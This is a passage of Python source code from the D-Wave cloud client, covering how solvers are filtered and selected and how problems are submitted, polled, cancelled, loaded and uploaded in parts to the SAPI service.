Test feature <name> value (which should be a *range*) covers a given value or a subrange.
* `within` (<name>: str, <value>: range expressed as 2-tuple/list):
Test feature <name> value (which can be a *single value* or a *range*) is within a given range.
* `in` (<name>: str, <value>: container type):
Test feature <name> value is *in* <value> container.
* `contains` (<name>: str, <value>: any):
Test feature <name> value (container type) *contains* <value>.
* `issubset` (<name>: str, <value>: container type):
Test feature <name> value (container type) is a subset of <value>.
* `issuperset` (<name>: str, <value>: container type):
Test feature <name> value (container type) is a superset of <value>.
Derived properies are:
* `name` (str): Solver name/id.
* `qpu` (bool): Solver is a QPU?
* `software` (bool): Solver is a software solver?
* `online` (bool, default=True): Is solver online?
* `num_active_qubits` (int): Number of active qubits. Less then or equal to `num_qubits`.
* `avg_load` (float): Solver's average load (similar to Unix load average).
Common solver parameters are:
* `flux_biases`: Should solver accept flux biases?
* `anneal_schedule`: Should solver accept anneal schedule?
Common solver properties are:
* `num_qubits` (int): Number of qubits available.
* `vfyc` (bool): Should solver work on "virtual full-yield chip"?
* `max_anneal_schedule_points` (int): Piecewise linear annealing schedule points.
* `h_range` ([int,int]), j_range ([int,int]): Biases/couplings values range.
* `num_reads_range` ([int,int]): Range of allowed values for `num_reads` parameter.
Returns:
list[Solver]: List of all solvers that satisfy the conditions.
Note:
Client subclasses (e.g. :class:`dwave.cloud.qpu.Client` or
:class:`dwave.cloud.hybrid.Client`) already filter solvers by resource
type, so for `qpu` and `hybrid` filters to have effect, call :meth:`.get_solvers`
on base :class:`~dwave.cloud.client.Client` class.
Examples::
client.get_solvers(
num_qubits__gt=2000, # we need more than 2000 qubits
num_qubits__lt=4000, # ... but fewer than 4000 qubits
num_qubits__within=(2000, 4000), # an alternative to the previous two lines
num_active_qubits=1089, # we want a particular number of active qubits
vfyc=True, # we require a fully yielded Chimera
vfyc__in=[False, None], # inverse of the previous filter
vfyc__available=False, # we want solvers that do not advertize the vfyc property
anneal_schedule=True, # we need support for custom anneal schedule
max_anneal_schedule_points__gte=4, # we need at least 4 points for our anneal schedule
num_reads_range__covers=1000, # our solver must support returning 1000 reads
extended_j_range__covers=[-2, 2], # we need extended J range to contain subrange [-2,2]
couplers__contains=[0, 128], # coupler (edge between) qubits (0,128) must exist
couplers__issuperset=[[0,128], [0,4]],
# two couplers required: (0,128) and (0,4)
qubits__issuperset={0, 4, 215}, # qubits 0, 4 and 215 must exist
supported_problem_types__issubset={'ising', 'qubo'},
# require Ising, QUBO or both to be supported
name='DW_2000Q_5', # full solver name/ID match
name__regex='.*2000.*', # partial/regex-based solver name match
chip_id__regex='DW_.*', # chip ID prefix must be DW_
topology__type__eq="chimera" # topology.type must be chimera
topology__type="chimera" # same as above, `eq` implied even for nested properties
)
"""
def covers_op(prop, val):
    """Return True iff the LHS range `prop` fully contains RHS `val`.

    `prop` must be a 2-element list/tuple (treated as an unordered range);
    `val` may be either a scalar or another 2-element range.

    Raises:
        ValueError: if `prop` is not a 2-element list/tuple.
    """
    if not (isinstance(prop, (list, tuple)) and len(prop) == 2):
        raise ValueError("2-element list/tuple range required for LHS value")
    # normalize the LHS range (order of endpoints is irrelevant)
    lower, upper = min(prop), max(prop)
    if isinstance(val, (list, tuple)) and len(val) == 2:
        # range-in-range containment
        return lower <= min(val) and max(val) <= upper
    # scalar-in-range containment
    return lower <= val <= upper
def within_op(prop, val):
    """Is LHS `prop` (range or item) fully covered by RHS `val` (range)?"""
    try:
        # Swap the operands: "prop within val" == "val covers prop".
        return covers_op(val, prop)
    except ValueError:
        # Re-raise with RHS wording: here the operand that must be a
        # 2-element range is `val`, not `prop`.
        raise ValueError("2-element list/tuple range required for RHS value")
def _set(iterable):
"""Like set(iterable), but works for lists as items in iterable.
Before constructing a set, lists are converted to tuples.
"""
first = next(iter(iterable))
if isinstance(first, list):
return set(tuple(x) for x in iterable)
return set(iterable)
def with_valid_lhs(op):
    """Wrap a binary predicate so that a missing (None) LHS yields False.

    Used to guard comparison operators against absent solver properties.
    """
    @wraps(op)
    def guarded(prop, val):
        # absent property can never satisfy the predicate
        return False if prop is None else op(prop, val)
    return guarded
# available filtering operators
ops = {
'lt': with_valid_lhs(operator.lt),
'lte': with_valid_lhs(operator.le),
'gt': with_valid_lhs(operator.gt),
'gte': with_valid_lhs(operator.ge),
'eq': operator.eq,
'available': lambda prop, val: prop is not None if val else prop is None,
'regex': with_valid_lhs(lambda prop, val: re.match("^{}$".format(val), prop)),
# range operations
'covers': with_valid_lhs(covers_op),
'within': with_valid_lhs(within_op),
# membership tests
'in': lambda prop, val: prop in val,
'contains': with_valid_lhs(lambda prop, val: val in prop),
# set tests
'issubset': with_valid_lhs(lambda prop, val: _set(prop).issubset(_set(val))),
'issuperset': with_valid_lhs(lambda prop, val: _set(prop).issuperset(_set(val))),
}
def predicate(solver, query, val):
    """Test a single filter against `solver`.

    `query` is the filter's LHS already split on '__'. Handles kwargs
    of the forms:
        key=val
        key__op=val
        key__key=val
        key__key__op=val
    """
    assert len(query) >= 1
    potential_path, potential_op_name = query[:-1], query[-1]
    if potential_op_name in ops:
        # op is explicit, and potential path is correct
        op_name = potential_op_name
    else:
        # op is implied and depends on property type, path is the whole query
        op_name = None
        potential_path = query
    path = '.'.join(potential_path)
    if path in solver.derived_properties:
        # derived properties live as attributes on the solver object
        op = ops[op_name or 'eq']
        return op(getattr(solver, path), val)
    elif pluck(solver.parameters, path, None) is not None:
        # for parameters, mere availability is the default (implied) test
        op = ops[op_name or 'available']
        return op(pluck(solver.parameters, path), val)
    elif pluck(solver.properties, path, None) is not None:
        op = ops[op_name or 'eq']
        return op(pluck(solver.properties, path), val)
    else:
        # unknown path: compare against None so e.g. `available=False` matches
        op = ops[op_name or 'eq']
        return op(None, val)
# param validation
sort_reverse = False
if not order_by:
sort_key = None
elif isinstance(order_by, str):
if order_by[0] == '-':
sort_reverse = True
order_by = order_by[1:]
if not order_by:
sort_key = None
else:
sort_key = lambda solver: pluck(solver, order_by, None)
elif callable(order_by):
sort_key = order_by
else:
raise TypeError("expected string or callable for 'order_by'")
# default filters:
filters.setdefault('online', True)
predicates = []
for lhs, val in filters.items():
query = lhs.split('__')
predicates.append(partial(predicate, query=query, val=val))
logger.debug("Filtering solvers with predicates=%r", predicates)
# optimization for case when exact solver name/id is known:
# we can fetch only that solver
# NOTE: in future, complete feature-based filtering will be on server-side
query = dict(refresh_=refresh)
if 'name' in filters:
query['name'] = filters['name']
if 'name__eq' in filters:
query['name'] = filters['name__eq']
# filter
solvers = self._fetch_solvers(**query)
solvers = [s for s in solvers if all(p(s) for p in predicates)]
# sort: undefined (None) key values go last
if sort_key is not None:
solvers_with_keys = [(sort_key(solver), solver) for solver in solvers]
solvers_with_invalid_keys = [(key, solver) for key, solver in solvers_with_keys if key is None]
solvers_with_valid_keys = [(key, solver) for key, solver in solvers_with_keys if key is not None]
solvers_with_valid_keys.sort(key=operator.itemgetter(0))
solvers = [solver for key, solver in chain(solvers_with_valid_keys, solvers_with_invalid_keys)]
# reverse if necessary (as a separate step from sorting, so it works for invalid keys
# and plain list reverse without sorting)
if sort_reverse:
solvers.reverse()
return solvers
def solvers(self, refresh=False, **filters):
    """Deprecated in favor of :meth:`.get_solvers`.

    Scheduled for removal in 0.9.0.
    """
    message = ("'solvers' is deprecated, and it will be removed "
               "in 0.9.0. please convert your code to use 'get_solvers'")
    warnings.warn(message, DeprecationWarning)
    return self.get_solvers(refresh=refresh, **filters)
def get_solver(self, name=None, refresh=False, **filters):
    """Load the configuration for a single solver.

    Makes a blocking web call to `{endpoint}/solvers/remote/{solver_name}/`, where `{endpoint}`
    is a URL configured for the client, and returns a :class:`.Solver` instance
    that can be used to submit sampling problems to the D-Wave API and retrieve results.

    Args:
        name (str):
            ID of the requested solver. ``None`` returns the default solver.
            If default solver is not configured, ``None`` returns the first available
            solver in ``Client``'s class (QPU/software/base).
        **filters (keyword arguments, optional):
            Dictionary of filters over features this solver has to have. For a list of
            feature names and values, see: :meth:`~dwave.cloud.client.Client.get_solvers`.
        order_by (callable/str/None, default='avg_load'):
            Solver sorting key function (or :class:`~dwave.cloud.solver.Solver`
            attribute/item dot-separated path). By default, solvers are sorted by average
            load. For details, see :meth:`~dwave.cloud.client.Client.get_solvers`.
        refresh (bool):
            Return solver from cache (if cached with
            :meth:`~dwave.cloud.client.Client.get_solvers`), unless set to
            ``True``.

    Returns:
        :class:`.Solver`

    Raises:
        :exc:`SolverNotFoundError`: if no solver satisfies all filters.

    Examples:
        This example creates two solvers for a client instantiated from
        a local system's auto-detected default configuration file, which configures
        a connection to a D-Wave resource that provides two solvers. The first
        uses the default solver, the second explicitly selects another solver.

        >>> from dwave.cloud import Client
        >>> client = Client.from_config()    # doctest: +SKIP
        >>> client.get_solvers()   # doctest: +SKIP
        [Solver(id='2000Q_ONLINE_SOLVER1'), Solver(id='2000Q_ONLINE_SOLVER2')]
        >>> solver1 = client.get_solver()    # doctest: +SKIP
        >>> solver2 = client.get_solver(name='2000Q_ONLINE_SOLVER2')    # doctest: +SKIP
        >>> solver1.id  # doctest: +SKIP
        '2000Q_ONLINE_SOLVER1'
        >>> solver2.id  # doctest: +SKIP
        '2000Q_ONLINE_SOLVER2'
        >>> # code that uses client
        >>> client.close() # doctest: +SKIP
    """
    logger.info("Requested a solver that best matches feature filters=%r", filters)

    # backward compatibility: name as the first feature
    if name is not None:
        filters.setdefault('name', name)

    # allow `order_by` to be specified as part of solver features dict
    order_by = filters.pop('order_by', None)

    # in absence of other filters, config/env solver filters/name are used
    if not filters and self.default_solver:
        filters = copy.deepcopy(self.default_solver)

    # allow `order_by` from default config/init override
    if order_by is None:
        # default filters may carry their own `order_by`; otherwise sort
        # by average load
        order_by = filters.pop('order_by', 'avg_load')
    else:
        # explicit `order_by` wins over any value in default filters
        filters.pop('order_by', None)

    # get the first solver that satisfies all filters
    try:
        logger.info("Fetching solvers according to filters=%r, order_by=%r",
                    filters, order_by)
        solvers = self.get_solvers(refresh=refresh, order_by=order_by, **filters)
        logger.info("Filtered solvers=%r", solvers)
        return solvers[0]
    except IndexError:
        raise SolverNotFoundError("Solver with the requested features not available")
def _submit(self, body, future):
    """Enqueue a problem for submission to the server.

    This method is thread safe.

    Args:
        body (:class:`concurrent.futures.Future`):
            Future resolving to the encoded problem body (see
            :meth:`._do_submit_problems`, which waits for it).
        future (:class:`~dwave.cloud.computation.Future`):
            Future tracking the remote problem's lifecycle.
    """
    self._submission_queue.put(self._submit.Message(body, future))

# Lightweight record type for items on the submission queue, attached to
# the method itself to keep it namespaced.
_submit.Message = namedtuple('Message', ['body', 'future'])
def _do_submit_problems(self):
    """Pull problems from the submission queue and submit them.

    Worker loop: batches up to ``_SUBMIT_BATCH_SIZE`` ready problems per
    POST request. Terminates when a ``None`` item is dequeued.

    Note:
        This method is always run inside of a daemon thread.
    """
    def task_done():
        self._submission_queue.task_done()

    def filter_ready(item):
        """Pass-through ready (encoded) problems, re-enqueue ones for which
        the encoding is in progress, and fail the ones for which encoding
        failed.
        """
        # body is a `concurrent.futures.Future`, so make sure
        # it's ready for submitting
        if item.body.done():
            exc = item.body.exception()
            if exc:
                # encoding failed, submit should fail as well
                logger.info("Problem encoding prior to submit "
                            "failed with: %r", exc)
                item.future._set_exception(exc)
                task_done()
            else:
                # problem ready for submit
                return [item]
        else:
            # body not ready, return the item to queue
            self._submission_queue.put(item)
            task_done()
        return []

    session = self.create_session()
    try:
        while True:
            # Pull as many problems as we can, block on the first one,
            # but once we have one problem, switch to non-blocking then
            # submit without blocking again.
            # `None` task is used to signal thread termination
            item = self._submission_queue.get()

            if item is None:
                task_done()
                break

            ready_problems = filter_ready(item)
            while len(ready_problems) < self._SUBMIT_BATCH_SIZE:
                try:
                    item = self._submission_queue.get_nowait()
                except queue.Empty:
                    break
                ready_problems.extend(filter_ready(item))

            if not ready_problems:
                continue

            # Submit the problems
            logger.debug("Submitting %d problems", len(ready_problems))
            try:
                # bodies are already JSON-encoded; join them into a JSON array
                body = '[' + ','.join(msg.body.result() for msg in ready_problems) + ']'
                logger.debug('Size of POST body = %d', len(body))
                message = Client._sapi_request(session.post, 'problems/', body)
                logger.debug("Finished submitting %d problems", len(ready_problems))
            except Exception as exc:
                logger.debug("Submit failed for %d problems with %r",
                             len(ready_problems), exc)
                for msg in ready_problems:
                    msg.future._set_exception(exc)
                    task_done()
                continue

            # Pass on the information
            for submission, msg in zip_longest(ready_problems, message):
                try:
                    self._handle_problem_status(msg, submission.future)
                except Exception as exc:
                    submission.future._set_exception(exc)
                finally:
                    task_done()
    except BaseException as err:
        logger.exception(err)
    finally:
        session.close()
def _handle_problem_status(self, message, future):
    """Handle the results of a problem submission or results request.

    This method checks the status of the problem and puts it in the correct
    queue.

    Args:
        message (dict):
            Update message from the SAPI server wrt. this problem.
        future (:class:`dwave.cloud.computation.Future`):
            Future corresponding to the problem.

    Note:
        This method is always run inside of a daemon thread.
    """
    try:
        logger.trace("Handling response: %r", message)
        if not isinstance(message, dict):
            raise InvalidAPIResponseError("Unexpected format of problem description response")
        logger.debug("Handling response for %s with status %s",
                     message.get('id'), message.get('status'))

        # Handle errors in batch mode
        if 'error_code' in message and 'error_msg' in message:
            logger.debug("Error response received: %r", message)
            raise SolverFailureError(message['error_msg'])

        if 'status' not in message:
            raise InvalidAPIResponseError("'status' missing in problem description response")
        if 'id' not in message:
            raise InvalidAPIResponseError("'id' missing in problem description response")

        future.id = message['id']
        future.label = message.get('label')
        future.remote_status = status = message['status']

        # The future may not have the ID set yet
        with future._single_cancel_lock:
            # This handles the case where cancel has been called on a future
            # before that future received the problem id
            if future._cancel_requested:
                if not future._cancel_sent and status == self.STATUS_PENDING:
                    # The problem has been canceled but the status says its still in queue
                    # try to cancel it
                    self._cancel(message['id'], future)
                # If a cancel request could meaningfully be sent it has been now
                future._cancel_sent = True

        if not future.time_received and message.get('submitted_on'):
            future.time_received = parse_datetime(message['submitted_on'])

        if not future.time_solved and message.get('solved_on'):
            future.time_solved = parse_datetime(message['solved_on'])

        if status == self.STATUS_COMPLETE:
            # TODO: find a better way to differentiate between
            # `completed-on-submit` and `completed-on-poll`.
            # Loading should happen only once, not every time when response
            # doesn't contain 'answer'.

            # If the message is complete, forward it to the future object
            if 'answer' in message:
                # If the future does not know which solver it's associated
                # with, we get it from the info provided from the server.
                # An alternative to making this call here would be to pass
                # self in with the message
                if future.solver is None:
                    future.solver = self.get_solver(name=message['solver'])
                future._set_message(message)
            # If the problem is complete, but we don't have the result data
            # put the problem in the queue for loading results.
            else:
                self._load(future)
        elif status in self.ANY_STATUS_ONGOING:
            # If the response is pending add it to the queue.
            self._poll(future)
        elif status == self.STATUS_CANCELLED:
            # If canceled return error
            raise CanceledFutureError()
        else:
            # Return an error to the future object
            errmsg = message.get('error_message', 'An unknown error has occurred.')
            if 'solver is offline' in errmsg.lower():
                raise SolverOfflineError(errmsg)
            else:
                raise SolverFailureError(errmsg)

    except Exception as exc:
        # If there were any unhandled errors we need to release the
        # lock in the future, otherwise deadlock occurs.
        future._set_exception(exc)
def _cancel(self, id_, future):
"""Enqueue a problem to be canceled.
This method is thread safe.
"""
self._cancel_queue.put((id_, future))
def _do_cancel_problems(self):
    """Pull ids from the cancel queue and submit them.

    Worker loop: drains the queue, then deletes all pending ids in a
    single batched DELETE request. Terminates when a ``None`` item is
    dequeued.

    Note:
        This method is always run inside of a daemon thread.
    """
    session = self.create_session()
    try:
        while True:
            # Pull as many problems as we can, block when none are available.

            # `None` task is used to signal thread termination
            item = self._cancel_queue.get()
            if item is None:
                break

            item_list = [item]
            while True:
                try:
                    item_list.append(self._cancel_queue.get_nowait())
                except queue.Empty:
                    break

            # Submit the problems, attach the ids as a json list in the
            # body of the delete query.
            try:
                ids = [item[0] for item in item_list]
                Client._sapi_request(session.delete, 'problems/', json=ids)
            except Exception as exc:
                # propagate the failure to every future in the batch
                for _, future in item_list:
                    if future is not None:
                        future._set_exception(exc)

            # Mark all the ids as processed regardless of success or failure.
            for _ in item_list:
                self._cancel_queue.task_done()
    except Exception as err:
        logger.exception(err)
    finally:
        session.close()
def _poll(self, future):
    """Enqueue a problem to poll the server for status.

    Applies exponential back-off between polls, clipped to the
    ``[poll_backoff_min, poll_backoff_max]`` range, and aborts with
    :exc:`PollingTimeout` if the next scheduled poll would exceed
    ``polling_timeout``.
    """
    if future._poll_backoff is None:
        # on first poll, start with minimal back-off
        future._poll_backoff = self.poll_backoff_min
    else:
        # on subsequent polls, do exponential back-off, clipped to a range
        future._poll_backoff = \
            max(self.poll_backoff_min,
                min(future._poll_backoff * 2, self.poll_backoff_max))

    # for poll priority we use timestamp of next scheduled poll
    at = time.time() + future._poll_backoff

    now = utcnow()
    future_age = (now - future.time_created).total_seconds()
    logger.debug("Polling scheduled at %.2f with %.2f sec new back-off for: %s (future's age: %.2f sec)",
                 at, future._poll_backoff, future.id, future_age)

    # don't enqueue for next poll if polling_timeout is exceeded by then
    future_age_on_next_poll = future_age + (at - datetime_to_timestamp(now))
    if self.polling_timeout is not None and future_age_on_next_poll > self.polling_timeout:
        logger.debug("Polling timeout exceeded before next poll: %.2f sec > %.2f sec, aborting polling!",
                     future_age_on_next_poll, self.polling_timeout)
        raise PollingTimeout

    # queue is a priority queue ordered by the scheduled poll time
    self._poll_queue.put((at, future))
def _do_poll_problems(self):
    """Poll the server for the status of a set of problems.

    Worker loop: groups futures scheduled within ``_POLL_GROUP_TIMEFRAME``
    into a single status request (up to ``_STATUS_QUERY_SIZE`` ids per
    request). Terminates when a ``None`` future is dequeued.

    Note:
        This method is always run inside of a daemon thread.
    """
    session = self.create_session()
    try:
        # grouped futures (all scheduled within _POLL_GROUP_TIMEFRAME)
        frame_futures = {}

        def task_done():
            self._poll_queue.task_done()

        def add(future):
            # add future to query frame_futures
            # returns: worker lives on?

            # `None` task signifies thread termination
            if future is None:
                task_done()
                return False

            # skip futures that are already done (or duplicates)
            if future.id not in frame_futures and not future.done():
                frame_futures[future.id] = future
            else:
                task_done()

            return True

        while True:
            frame_futures.clear()

            # blocking add first scheduled
            frame_earliest, future = self._poll_queue.get()
            if not add(future):
                return

            # try grouping if scheduled within grouping timeframe
            while len(frame_futures) < self._STATUS_QUERY_SIZE:
                try:
                    task = self._poll_queue.get_nowait()
                except queue.Empty:
                    break

                at, future = task
                if at - frame_earliest <= self._POLL_GROUP_TIMEFRAME:
                    if not add(future):
                        return
                else:
                    # scheduled too far out: return it for a later frame
                    task_done()
                    self._poll_queue.put(task)
                    break

            # build a query string with ids of all futures in this frame
            ids = [future.id for future in frame_futures.values()]
            logger.debug("Polling for status of futures: %s", ids)
            query_string = 'problems/?id=' + ','.join(ids)

            # if futures were cancelled while `add`ing, skip empty frame
            if not ids:
                continue

            # wait until `frame_earliest` before polling
            delay = frame_earliest - time.time()
            if delay > 0:
                logger.debug("Pausing polling %.2f sec for futures: %s", delay, ids)
                time.sleep(delay)
            else:
                logger.trace("Skipping non-positive delay of %.2f sec", delay)

            # execute and handle the polling request
            try:
                logger.trace("Executing poll API request")

                try:
                    statuses = Client._sapi_request(session.get, query_string)
                except SAPIError as exc:
                    # assume 5xx errors are transient, and don't abort polling
                    if 500 <= exc.error_code < 600:
                        logger.warning(
                            "Received an internal server error response on "
                            "problem status polling request (%s). Assuming "
                            "error is transient, and resuming polling.",
                            exc.error_code)
                        # add all futures in this frame back to the polling queue
                        # XXX: logic split between `_handle_problem_status` and here
                        for future in frame_futures.values():
                            self._poll(future)
                    else:
                        raise
                else:
                    # handle a successful request
                    for status in statuses:
                        self._handle_problem_status(status, frame_futures[status['id']])

            except Exception as exc:
                for id_ in frame_futures.keys():
                    frame_futures[id_]._set_exception(exc)

            for id_ in frame_futures.keys():
                task_done()
    except Exception as err:
        logger.exception(err)
    finally:
        session.close()
def _load(self, future):
    """Enqueue a problem to download results from the server.

    Args:
        future (:class:`~dwave.cloud.computation.Future`):
            Future object corresponding to the remote computation.

    This method is thread-safe.
    """
    self._load_queue.put(future)
def _do_load_results(self):
    """Submit a query asking for the results for a particular problem.

    To request the results of a problem: ``GET /problems/{problem_id}/``

    Worker loop: terminates when a ``None`` future is dequeued.

    Note:
        This method is always run inside of a daemon thread.
    """
    session = self.create_session()
    try:
        while True:
            # Select a problem
            future = self._load_queue.get()
            # `None` task signifies thread termination
            if future is None:
                break
            logger.debug("Loading results of: %s", future.id)

            # Submit the query
            query_string = 'problems/{}/'.format(future.id)
            try:
                message = Client._sapi_request(session.get, query_string)
            except Exception as exc:
                logger.debug("Answer load request failed with %r", exc)
                future._set_exception(exc)
                self._load_queue.task_done()
                continue

            # Dispatch the results, mark the task complete
            self._handle_problem_status(message, future)
            self._load_queue.task_done()
    except Exception as err:
        # lazy %-style args, consistent with logging usage elsewhere in
        # this module (was eager 'Load result error: ' + str(err))
        logger.error("Load result error: %s", err)
    finally:
        session.close()
def upload_problem_encoded(self, problem, problem_id=None):
    """Initiate multipart problem upload, returning the Problem ID in a
    :class:`~concurrent.futures.Future`.

    Args:
        problem (bytes-like/file-like):
            Encoded problem data to upload.
        problem_id (str, optional):
            Problem ID. If provided, problem will be re-uploaded. Previously
            uploaded parts, with a matching checksum, are skipped.

    Returns:
        :class:`concurrent.futures.Future`[str]:
            Problem ID in a Future. Problem ID can be used to submit
            problems by reference.

    Note:
        For a higher-level interface, use upload/submit solver methods.
    """
    # the heavy lifting is done asynchronously by _upload_problem_worker
    return self._upload_problem_executor.submit(
        self._upload_problem_worker, problem=problem, problem_id=problem_id)
@staticmethod
def _sapi_request(meth, *args, **kwargs):
    """Execute an HTTP request defined with the ``meth`` callable and
    parse the response and interpret errors in compliance with SAPI REST
    interface.

    Note:
        For internal use only.

    Args:
        meth (callable):
            Callable object to be called with args and kwargs supplied, with
            expected behavior consistent with one of ``requests.Session()``
            request methods.
        *args, **kwargs (list, dict):
            Arguments to the ``meth`` callable.

    Returns:
        dict: JSON decoded body.

    Raises:
        A :class:`~dwave.cloud.exceptions.SAPIError` subclass, or
        :class:`~dwave.cloud.exceptions.RequestTimeout`.
    """
    caller = inspect.stack()[1].function
    verb = meth.__name__
    logger.trace("[%s] request: session.%s(*%r, **%r)", caller, verb, args, kwargs)

    # execute request
    try:
        response = meth(*args, **kwargs)
    except Exception as exc:
        if is_caused_by(exc, (requests.exceptions.Timeout,
                              urllib3.exceptions.TimeoutError)):
            raise RequestTimeout
        else:
            raise

    # parse response
    logger.trace("[%s] response: (code=%r, body=%r)",
                 caller, response.status_code, response.text)

    # workaround for charset_normalizer episode in requests>=2.26.0,
    # where decoding of an empty json object '{}' fails.
    # see: https://github.com/psf/requests/issues/5871,
    # https://github.com/dwavesystems/dwave-cloud-client/pull/471, and
    # https://github.com/dwavesystems/dwave-cloud-client/pull/476.
    response.encoding = 'utf-8'

    # NOTE: the expected behavior is for SAPI to return JSON error on
    # failure. However, that is currently not the case. We need to work
    # around this until it's fixed.

    # no error -> body is json
    # error -> body can be json or plain text error message
    if response.ok:
        try:
            return response.json()
        # fix: was a bare `except:` that also swallowed SystemExit and
        # KeyboardInterrupt; only JSON decode failures should be handled
        except Exception:
            raise InvalidAPIResponseError("JSON response expected")

    else:
        if response.status_code == 401:
            raise SolverAuthenticationError(error_code=401)

        try:
            msg = response.json()
            error_msg = msg['error_msg']
            error_code = msg['error_code']
        # fix: was a bare `except:` (see above); fall back to plain-text body
        except Exception:
            error_msg = response.text
            error_code = response.status_code

        # NOTE: for backwards compat only. Change to: SAPIError
        raise SolverError(error_msg=error_msg, error_code=error_code)
@staticmethod
@retried(_UPLOAD_REQUEST_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _initiate_multipart_upload(session, size):
    """Start a new multipart problem upload (sync http request).

    Returns the server-assigned problem id.
    """
    logger.debug("Initiating problem multipart upload (size=%r)", size)

    msg = Client._sapi_request(
        session.post, 'bqm/multipart', json=dict(size=size))

    try:
        problem_id = msg['id']
    except KeyError:
        raise InvalidAPIResponseError("problem ID missing")

    logger.debug("Multipart upload initiated (problem_id=%r)", problem_id)
    return problem_id
@staticmethod
def _digest(data):
# data: bytes => md5(data): bytes
return hashlib.md5(data).digest()
@staticmethod
def _checksum_b64(digest):
# digest: bytes => base64(digest): str
return base64.b64encode(digest).decode('ascii')
@staticmethod
def _checksum_hex(digest):
# digest: bytes => hex(digest): str
return codecs.encode(digest, 'hex').decode('ascii')
@staticmethod
def _combined_checksum(checksums):
    """Combined checksum over all part digests, ordered by part number.

    checksums: Dict[int, str] => hex(md5(cat(digests))): str
    """
    # TODO: drop this requirement server-side
    ordered_hex = [h for _, h in sorted(checksums.items())]
    digest = codecs.decode(''.join(ordered_hex), 'hex')
    return Client._checksum_hex(Client._digest(digest))
@staticmethod
@retried(_UPLOAD_PART_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _upload_multipart_part(session, problem_id, part_id, part_generator,
                           uploaded_part_checksum=None):
    """Upload one problem part. Sync http request.

    Args:
        session (:class:`requests.Session`):
            Session used for all API requests.
        problem_id (str):
            Problem id.
        part_id (int):
            Part number/id.
        part_generator (generator of :class:`io.BufferedIOBase`/binary-stream-like):
            Callable that produces problem part data container that supports
            `read` and `seek` operations.
        uploaded_part_checksum (str/None):
            Checksum of previously uploaded part. Optional, but if specified
            checksum is verified, and part is uploaded only if checksums
            don't match.

    Returns:
        Hex digest of part data MD5 checksum.
    """
    logger.debug("Uploading part_id=%r of problem_id=%r", part_id, problem_id)

    # generate the mutable part stream from immutable stream generator
    part_stream = part_generator()

    # TODO: work-around to get a checksum of a binary stream (avoid 2x read)
    data = part_stream.read()
    digest = Client._digest(data)
    b64digest = Client._checksum_b64(digest)
    hexdigest = Client._checksum_hex(digest)
    del data

    if uploaded_part_checksum is not None:
        if hexdigest == uploaded_part_checksum:
            logger.debug("Uploaded part checksum matches. "
                         "Skipping upload for part_id=%r.", part_id)
            return hexdigest
        else:
            logger.debug("Uploaded part checksum does not match. "
                         "Re-uploading part_id=%r.", part_id)

    # rewind the stream after read
    part_stream.seek(0)

    path = 'bqm/multipart/{problem_id}/part/{part_id}'.format(
        problem_id=problem_id, part_id=part_id)
    headers = {
        'Content-MD5': b64digest,
        'Content-Type': 'application/octet-stream',
    }

    # fix: response body was bound to an unused local (`msg`); the call
    # is kept for its effect (_sapi_request raises on API errors)
    Client._sapi_request(session.put, path, data=part_stream, headers=headers)

    logger.debug("Uploaded part_id=%r of problem_id=%r", part_id, problem_id)
    return hexdigest
@staticmethod
@retried(_UPLOAD_REQUEST_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _get_multipart_upload_status(session, problem_id):
    """Fetch the multipart upload status of `problem_id` (sync http request).

    Returns the decoded status message; raises
    :exc:`InvalidAPIResponseError` if mandatory keys are missing.
    """
    logger.debug("Checking upload status of problem_id=%r", problem_id)

    path = 'bqm/multipart/{problem_id}/status'.format(problem_id=problem_id)

    msg = Client._sapi_request(session.get, path)

    try:
        # subscript both keys purely to validate their presence
        msg['status']
        msg['parts']
    except KeyError:
        raise InvalidAPIResponseError("'status' and/or 'parts' missing")

    logger.debug("Got upload status=%r for problem_id=%r",
                 msg['status'], problem_id)

    return msg
@staticmethod
def _failsafe_get_multipart_upload_status(session, problem_id):
    """Like :meth:`._get_multipart_upload_status`, but never raises.

    On any failure, returns a placeholder status dict so the caller can
    proceed as if no parts were uploaded yet.
    """
    try:
        return Client._get_multipart_upload_status(session, problem_id)
    except Exception as e:
        logger.debug("Upload status check failed with %r", e)

    return {"status": "UNDEFINED", "parts": []}
@staticmethod
@retried(_UPLOAD_REQUEST_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _combine_uploaded_parts(session, problem_id, checksum):
    """Ask SAPI to combine all uploaded parts of a problem (sync http request).

    Args:
        session: Session used for the API request.
        problem_id (str): Problem id.
        checksum (str): Combined checksum of all parts
            (see :meth:`._combined_checksum`).
    """
    logger.debug("Combining uploaded parts of problem_id=%r", problem_id)

    path = 'bqm/multipart/{problem_id}/combine'.format(problem_id=problem_id)
    body = dict(checksum=checksum)

    # fix: response body was bound to an unused local (`msg`); the call
    # is kept for its effect (_sapi_request raises on API errors)
    Client._sapi_request(session.post, path, json=body)

    logger.debug("Issued a combine command for problem_id=%r", problem_id)
@staticmethod
def _uploaded_parts_from_problem_status(problem_status):
uploaded_parts = {}
if problem_status.get('status') == 'UPLOAD_IN_PROGRESS':
for part in problem_status.get('parts', ()):
part_no = part.get('part_number')
checksum = part.get('checksum', '').strip('"') # fix double-quoting bug
uploaded_parts[part_no] = checksum
return uploaded_parts
def _upload_part_worker(self, problem_id, part_no, chunk_generator,
                        uploaded_part_checksum=None):
    """Upload a single problem part in a fresh session.

    Runs on the part-upload executor. Returns ``(part_no, checksum)``
    so results can be matched back to parts.
    """
    with self.create_session() as session:
        part_checksum = self._upload_multipart_part(
            session, problem_id, part_id=part_no, part_generator=chunk_generator,
            uploaded_part_checksum=uploaded_part_checksum)

        return part_no, part_checksum
def _upload_problem_worker(self, problem, problem_id=None):
    """Upload a problem to SAPI using multipart upload interface.

    Args:
        problem (bytes/str/file-like):
            Problem description.

        problem_id (str, optional):
            Problem ID under which to upload the problem. If omitted, a new
            problem is created.

    Returns:
        str: Problem ID of the uploaded problem.

    Raises:
        :exc:`ProblemUploadError`: on any failure during initiation, part
            upload, checksum verification, or the final combine request.
    """
    # in python 3.7+ we could create the session once, on thread init,
    # via executor initializer
    with self.create_session() as session:
        chunks = ChunkedData(problem, chunk_size=self._UPLOAD_PART_SIZE_BYTES)
        size = chunks.total_size

        if problem_id is None:
            try:
                problem_id = self._initiate_multipart_upload(session, size)
            except Exception as e:
                errmsg = ("Multipart upload initialization failed "
                          "with {!r}.".format(e))
                logger.error(errmsg)
                raise ProblemUploadError(errmsg) from e

